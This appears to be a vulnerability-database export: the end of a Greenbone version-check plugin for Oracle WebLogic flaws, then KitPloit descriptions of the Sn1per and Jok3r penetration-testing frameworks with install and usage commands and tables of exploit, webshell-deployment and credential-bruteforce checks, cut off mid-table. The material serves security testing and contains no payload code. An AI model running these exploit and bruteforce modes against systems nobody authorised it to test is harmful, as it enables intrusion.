script_oid(\"1.3.6.1.4.1.25623.1.0.811244\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-10137\", \"CVE-2017-5638\", \"CVE-2017-10147\", \"CVE-2017-10178\", \"CVE-2013-2027\",\n \"CVE-2017-10148\", \"CVE-2017-10063\", \"CVE-2017-10123\", \"CVE-2017-10352\", \"CVE-2017-10271\",\n \"CVE-2017-10152\", \"CVE-2017-10336\", \"CVE-2017-10334\");\n script_bugtraq_id(96729, 99651, 99644, 78027, 99652, 99653, 101304, 101392);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-19 12:53:23 +0530 (Wed, 19 Jul 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to some unspecified errors in the\n 'Sample apps (Struts 2)', 'Core Components', 'Web Container', 'WLST'\n 'Web Services', 'WLS-WebServices' and 'WLS Security' components of application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to have an impact on confidentiality, integrity and availability.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.3.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced advisories for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('10.3.6.0.0', '12.1.3.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2020-12-08T17:25:08", "bulletinFamily": "tools", "cvelist": ["CVE-2017-7269", "CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2014-0160", "CVE-2017-9805", "CVE-2015-8249", "CVE-2014-6271", "CVE-2017-12617"], "description": "[  ](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n** Detailed host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n** NMap HTML host reports ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n** Takeovers and Email Security ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n** HTML5 Notepad ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n** ORDER SN1PER PROFESSIONAL: ** \nTo obtain a Sn1per Professional license, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n \n** DEMO VIDEO: ** \n \n \n\n\n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** EXPLOITS: ** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003 \n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts \n * Drupal: CVE-2018-7600: [ Remote Code Execution ](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002 \n * GPON Routers - Authentication Bypass / [ Command Injection ](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561 \n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption \n * Apache Tomcat: Remote Code Execution (CVE-2017-12617) \n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271 \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805) \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 \n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 \n * Shellshock Bash Shell remote code execution CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) \n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843 \n * MS08-067 Microsoft Server Service Relative Path Stack Corruption \n * Webmin File Disclosure CVE-2006-3392 \n * VsFTPd 2.3.4 Backdoor \n * ProFTPd 1.3.3C Backdoor \n * MS03-026 Microsoft RPC DCOM Interface Overflow \n * DistCC Daemon Command Execution \n * JBoss Java De-Serialization \n * HTTP Writable Path PUT/DELETE File Access \n * Apache Tomcat User Enumeration \n * Tomcat Application Manager Login Bruteforce \n * Jenkins-CI Enumeration \n * HTTP WebDAV Scanner \n * Android Insecure ADB \n * Anonymous FTP Access \n * PHPMyAdmin Backdoor \n * PHPMyAdmin Auth Bypass \n * OpenSSH User Enumeration \n * LibSSH Auth Bypass \n * SMTP User Enumeration \n * Public NFS Mounts \n \n** KALI LINUX INSTALL: ** \n\n \n \n bash install.sh\n\n \n** UBUNTU/DEBIAN/PARROT INSTALL: ** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n** DOCKER INSTALL: ** \n\n \n \n docker build Dockerfile\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** FLYOVER: ** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** WEBSCAN: ** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \"https://gist.github.com/1N3/8214ec2da2c91691bcbc\" ) \n \n \n\n\n** [ Download Sn1per ](<https://github.com/1N3/Sn1per> \"Download Sn1per\" ) **\n", "edition": 26, "modified": "2019-05-12T13:09:05", "published": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T23:27:41", "bulletinFamily": "tools", "cvelist": ["CVE-2017-9798", "CVE-2018-2893", "CVE-2012-1675", "CVE-2011-1720", "CVE-2017-7494", "CVE-2017-3248", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2010-4344", "CVE-2017-9805", "CVE-2014-6271", "CVE-2015-0240", "CVE-2016-8735", "CVE-2017-12617", "CVE-2011-1764", "CVE-2012-2122", "CVE-2015-4852"], "description": "[  ](<https://2.bp.blogspot.com/-b-yEHDNsbTk/XEN8U7E8E2I/AAAAAAAAN8A/cGC9Z8NjoSUkGMyEFR9xJYU2XISstK8EgCLcBGAs/s1600/jok3r_1_logo.png>)\n\n \n_ Jok3r _ is a Python3 CLI application which is aimed at ** helping penetration testers for network infrastructure and web black-box security tests ** . \nIts main goal is to ** save time on everything that can be automated during network/web pentest in order to enjoy more time on more interesting and challenging stuff ** . \nTo achieve that, it ** combines open-source Hacking tools to run various security checks against all common network services. ** \n** \n** [ ](<https://draft.blogger.com/null>) \n** Main features ** \n** Toolbox management ** : \n\n\n * Install automatically all the hacking tools used by _ Jok3r _ , \n * Keep the toolbox up-to-date, \n * Easily add new tools. \n** Attack automation ** : \n\n\n * Target most common network services (including web), \n * Run security checks by chaining hacking tools, following standard process (Reconaissance, Vulnerability scanning, Exploitation, Account bruteforce, (Basic) Post-exploitation). \n * Let _ Jok3r _ automatically choose the checks to run according to the context and knowledge about the target, \n** Mission management / Local database ** : \n\n\n * Organize targets by missions in local database, \n * Fully manage missions and targets (hosts/services) via interactive shell (like msfconsole db), \n * Access results from security checks. \n_ Jok3r _ has been built with the ambition to be easily and quickly customizable: Tools, security checks, supported network services... can be easily added/edited/removed by editing settings files with an easy-to-understand syntax. \n \n[ ](<https://draft.blogger.com/null>) \n** Installation ** \n** The recommended way to use Jok3r is inside a Docker container so you will not have to worry about dependencies issues and installing the various hacking tools of the toolbox. ** \n \nA Docker image is available on Docker Hub and automatically re-built at each update: [ https://hub.docker.com/r/koutto/jok3r/ ](<https://hub.docker.com/r/koutto/jok3r/>) . It is initially based on official Kali Linux Docker image (kalilinux/kali-linux-docker). \n \n** Pull Jok3r Docker Image: ** \n\n \n \n sudo docker pull koutto/jok3r\n\n** Run fresh Docker container: ** \n\n \n \n sudo docker run -i -t --name jok3r-container -w /root/jok3r --net=host koutto/jok3r\n\n** Important: --net=host option is required to share host's interface. It is needed for reverse connections (e.g. Ping to container when testing for RCE, Get a reverse shell) ** \nJok3r and its toolbox is ready-to-use ! \n\n\n * To re-run a stopped container: \n \n \n sudo docker start -i jok3r-container\n\n * To open multiple shells inside the container: \n \n \n sudo docker exec -it jok3r-container bash\n\nFor information about building your own Docker image or installing _ Jok3r _ on your system without using Docker, refer to [ https://jok3r.readthedocs.io/en/latest/installation.html ](<https://jok3r.readthedocs.io/en/latest/installation.html>) \n \n[ ](<https://draft.blogger.com/null>) \n** Quick usage examples ** \n** Show all the tools in the toolbox ** \n\n \n \n python3 jok3r.py toolbox --show-all\n\n** Install all the tools in the toolbox ** \n\n \n \n python3 jok3r.py toolbox --install-all --fast\n\n** Update all the tools in the toolbox ** \n\n \n \n python3 jok3r.py toolbox --update-all --fast\n\n** List supported services ** \n\n \n \n python3 jok3r.py info --services\n\n** Show security checks for HTTP ** \n\n \n \n python3 jok3r.py info --checks http\n\n** Create a new mission in local database ** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n** Run security checks against an URL and add results to the mission ** \n\n \n \n python3 jok3r.py attack -t https://www.example.com/webapp/ --add MayhemProject\n\n** Run security checks against a MSSQL service (without user-interaction) and add results to the mission ** \n\n \n \n python3 jok3r.py attack -t 192.168.1.42:1433 -s mssql --add MayhemProject --fast\n\n** Import hosts/services from Nmap results into the mission scope ** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission MayhemProject\n \n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]> nmap results.xml\n\n** Run security checks against all services in the given mission and store results in the database ** \n\n \n \n python3 jok3r.py attack -m MayhemProject --fast\n\n** Run security checks against only FTP services running on ports 21/tcp and 2121/tcp from the mission ** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=21,2121;service=ftp\" --fast\n\n** Run security checks against only FTP services running on ports 2121/tcp and all HTTP services on 192.168.1.42 from the mission ** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=2121;service=ftp\" -f \"ip=192.168.1.42;service=http\"\n\n[ ](<https://draft.blogger.com/null>) \n \n** Typical usage example ** \nYou begin a pentest with several servers in the scope. Here is a typical example of usage of _ JoK3r _ : \n\n\n 1. You run _ Nmap _ scan on the servers in the scope. \n 2. You create a new mission (let's say \"MayhemProject\") in the local database: \n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n 3. You import your results from _ Nmap _ scan in the database: \n \n \n jok3rdb[MayhemProject]> nmap results.xml\n\n 4. You can then have a quick overview of all services and hosts in the scope, add some comments, add some credentials if you already have some knowledge about the targets (grey box pentest), and so on \n \n \n jok3rdb[MayhemProject]> hosts\n \n [...]\n \n jok3rdb[MayhemProject]> services\n \n [...]\n\n 5. Now, you can run security checks against some targets in the scope. For example, if you want to run checks against all Java-RMI services in the scope, you can run the following command: \n \n \n python3 jok3r.py attack -m MayhemProject -f \"service=java-rmi\" --fast\n\n 6. You can view the results from the security checks either in live when the tools are executed or later from the database using the following command: \n \n \n jok3rdb[MayhemProject]> results\n\n[ ](<https://draft.blogger.com/null>) \n \n** Full Documentation ** \nDocumentation is available at: [ https://jok3r.readthedocs.io/ ](<https://jok3r.readthedocs.io/>) \n \n[ ](<https://draft.blogger.com/null>) \n** Supported Services & Security Checks ** \n** Lots of checks remain to be implemented and services must be added !! Work in progress ... ** \n\n\n * [ AJP (default 8009/tcp) ](<https://github.com/koutto/jok3r#ajp-default-8009-tcp>)\n * [ FTP (default 21/tcp) ](<https://github.com/koutto/jok3r#ftp-default-21-tcp>)\n * [ HTTP (default 80/tcp) ](<https://github.com/koutto/jok3r#http-default-80-tcp>)\n * [ Java-RMI (default 1099/tcp) ](<https://github.com/koutto/jok3r#java-rmi-default-1099-tcp>)\n * [ JDWP (default 9000/tcp) ](<https://github.com/koutto/jok3r#jdwp-default-9000-tcp>)\n * [ MSSQL (default 1433/tcp) ](<https://github.com/koutto/jok3r#mssql-default-1433-tcp>)\n * [ MySQL (default 3306/tcp) ](<https://github.com/koutto/jok3r#mysql-default-3306-tcp>)\n * [ Oracle (default 1521/tcp) ](<https://github.com/koutto/jok3r#oracle-default-1521-tcp>)\n * [ PostgreSQL (default 5432/tcp) ](<https://github.com/koutto/jok3r#postgresql-default-5432-tcp>)\n * [ RDP (default 3389/tcp) ](<https://github.com/koutto/jok3r#rdp-default-3389-tcp>)\n * [ SMB (default 445/tcp) ](<https://github.com/koutto/jok3r#smb-default-445-tcp>)\n * [ SMTP (default 25/tcp) ](<https://github.com/koutto/jok3r#smtp-default-25-tcp>)\n * [ SNMP (default 161/udp) ](<https://github.com/koutto/jok3r#snmp-default-161-udp>)\n * [ SSH (default 22/tcp) ](<https://github.com/koutto/jok3r#ssh-default-22-tcp>)\n * [ Telnet (default 21/tcp) ](<https://github.com/koutto/jok3r#telnet-default-21-tcp>)\n * [ VNC (default 5900/tcp) ](<https://github.com/koutto/jok3r#vnc-default-5900-tcp>)\n\n \n\n\n[ ](<https://draft.blogger.com/null>) \n** AJP (default 8009/tcp) ** \n\n \n \n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap AJP scripts | nmap |\n | tomcat-version | recon | Fingerprint Tomcat version through AJP | ajpy |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | default-creds-tomcat | bruteforce | Check [default credentials](<https://www.kitploit.com/search/label/Default%20Credentials>) for Tomcat Application Manager | ajpy |\n | deploy-webshell-tomcat | exploit | Deploy a webshell on Tomcat through AJP | ajpy |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** FTP (default 21/tcp) ** \n\n \n \n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap FTP scripts | nmap |\n | nmap-vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | ftpmap-scan | vulnscan | Identify FTP server soft/version and check for known vulns | ftpmap |\n | common-creds | bruteforce | Check common credentials on FTP server | patator |\n | bruteforce-creds | bruteforce | Bruteforce FTP accounts | patator |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** HTTP (default 80/tcp) ** \n\n \n \n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | Name | Category | Description | Tool used |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | nmap-recon | recon | Recon using Nmap HTTP scripts | nmap |\n | load-balancing-detection | recon | HTTP load balancer detection | halberd |\n | waf-detection | recon | Identify and fingerprint WAF products protecting website | wafw00f |\n | tls-probing | recon | Identify the implementation in use by SSL/TLS servers (might allow server fingerprinting) | tls-prober |\n | fingerprinting-multi-whatweb | recon | Identify CMS, blogging platforms, JS libraries, Web servers | whatweb |\n | fingerprinting-app-server | recon | Fingerprint application server (JBoss, ColdFusion, Weblogic, Tomcat, Railo, Axis2, Glassfish) | clusterd |\n | fingerprinting-server-domino | recon | Fingerprint IBM/Lotus Domino server | domiowned |\n | fingerprinting-cms-wig | recon | Identify several CMS and other administrative applications | wig |\n | fingerprinting-cms-cmseek | recon | Detect CMS (130+ supported), detect version on Drupal, advanced scan on Wordpress/Joomla | cmseek |\n | fingerprinting-cms-fingerprinter | recon | Fingerprint precisely CMS versions (based on files checksums) | fingerprinter |\n | fingerprinting-cms-cmsexplorer | recon | Find plugins and themes (using bruteforce) installed in a CMS (Wordpress, Drupal, Joomla, Mambo) | cmsexplorer |\n | fingerprinting-drupal | recon | Fingerprint Drupal 7/8: users, nodes, default files, modules, themes enumeration | drupwn |\n | crawling-fast | recon | Crawl website quickly, analyze interesting files/directories | dirhunt |\n | crawling-fast2 | recon | Crawl website and extract URLs, files, intel & endpoints | photon |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | ssl-check | vulnscan | Check for SSL/TLS configuration | testssl |\n | vulnscan-multi-nikto | vulnscan | Check for multiple web vulnerabilities/misconfigurations | nikto |\n | default-creds-web-multi | vulnscan | Check for default credentials on various web interfaces | changeme |\n | webdav-scan-davscan | vulnscan | Scan HTTP WebDAV | davscan |\n | webdav-scan-msf | vulnscan | Scan HTTP WebDAV | metasploit |\n | webdav-internal-ip-disclosure | vulnscan | Check for WebDAV internal IP disclosure | metasploit |\n | webdav-website-content | vulnscan | Detect webservers disclosing its content through WebDAV | metasploit |\n | http-put-check | vulnscan | Detect the support of dangerous HTTP PUT method | metasploit |\n | apache-optionsbleed-check | vulnscan | Test for the Optionsbleed bug in Apache httpd (CVE-2017-9798) | optionsbleed |\n | shellshock-scan | vulnscan | Detect if web server is vulnerable to Shellshock (CVE-2014-6271) | shocker |\n | iis-shortname-scan | vulnscan | Scan for IIS short filename (8.3) disclosure vulnerability | iis-shortname-scanner |\n | iis-internal-ip-disclosure | vulnscan | Check for IIS internal IP disclosure | metasploit |\n | tomcat-user-enum | vulnscan | Enumerate users on Tomcat 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18 | metasploit |\n | jboss-vulnscan-multi | vulnscan | Scan JBoss application server for multiple vulnerabilities | metasploit |\n | jboss-status-infoleak | vulnscan | Queries JBoss status servlet to collect [sensitive information](<https://www.kitploit.com/search/label/Sensitive%20Information>) (JBoss 4.0, 4.2.2 and 4.2.3) | metasploit |\n | jenkins-infoleak | vulnscan | Enumerate a remote Jenkins-CI installation in an unauthenticated manner | metasploit |\n | cms-multi-vulnscan-cmsmap | vulnscan | Check for vulnerabilities in CMS Wordpress, Drupal, Joomla | cmsmap |\n | wordpress-vulscan | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpscan |\n | wordpress-vulscan2 | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpseku |\n | joomla-vulnscan | vulnscan | Scan for vulnerabilities in CMS Joomla | joomscan |\n | joomla-vulnscan2 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlascan |\n | joomla-vulnscan3 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlavs |\n | drupal-vulnscan | vulnscan | Scan for vulnerabilities in CMS Drupal | droopescan |\n | magento-vulnscan | vulnscan | Check for misconfigurations in CMS Magento | magescan |\n | silverstripe-vulnscan | vulnscan | Scan for vulnerabilities in CMS Silverstripe | droopescan |\n | vbulletin-vulnscan | vulnscan | Scan for vulnerabilities in CMS vBulletin | vbscan |\n | liferay-vulnscan | vulnscan | Scan for vulnerabilities in CMS Liferay | liferayscan |\n | angularjs-csti-scan | vulnscan | Scan for AngularJS Client-Side Template Injection | angularjs-csti-scanner |\n | jboss-deploy-shell | exploit | Try to deploy shell on JBoss server (jmx|web|admin-console, JMXInvokerServlet) | jexboss |\n | struts2-rce-cve2017-5638 | exploit | Exploit Apache Struts2 Jakarta Multipart parser RCE (CVE-2017-5638) | jexboss |\n | struts2-rce-cve2017-9805 | exploit | Exploit Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805) | struts-pwn-cve2017-9805 |\n | struts2-rce-cve2018-11776 | exploit | Exploit Apache Struts2 [misconfiguration](<https://www.kitploit.com/search/label/Misconfiguration>) RCE (CVE-2018-11776) | struts-pwn-cve2018-11776 |\n | tomcat-rce-cve2017-12617 | exploit | Exploit for Apache Tomcat JSP Upload Bypass RCE (CVE-2017-12617) | exploit-tomcat-cve2017-12617 |\n | jenkins-cliport-deserialize | exploit | Exploit Java deserialization in Jenkins CLI port | jexboss |\n | weblogic-t3-deserialize-cve2015-4852 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2015-4852) | loubia |\n | weblogic-t3-deserialize-cve2017-3248 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2017-3248) | exploit-weblogic-cve2017-3248 |\n | weblogic-t3-deserialize-cve2018-2893 | exploit | Exploit Java deserialization in Weblogic T3(s) 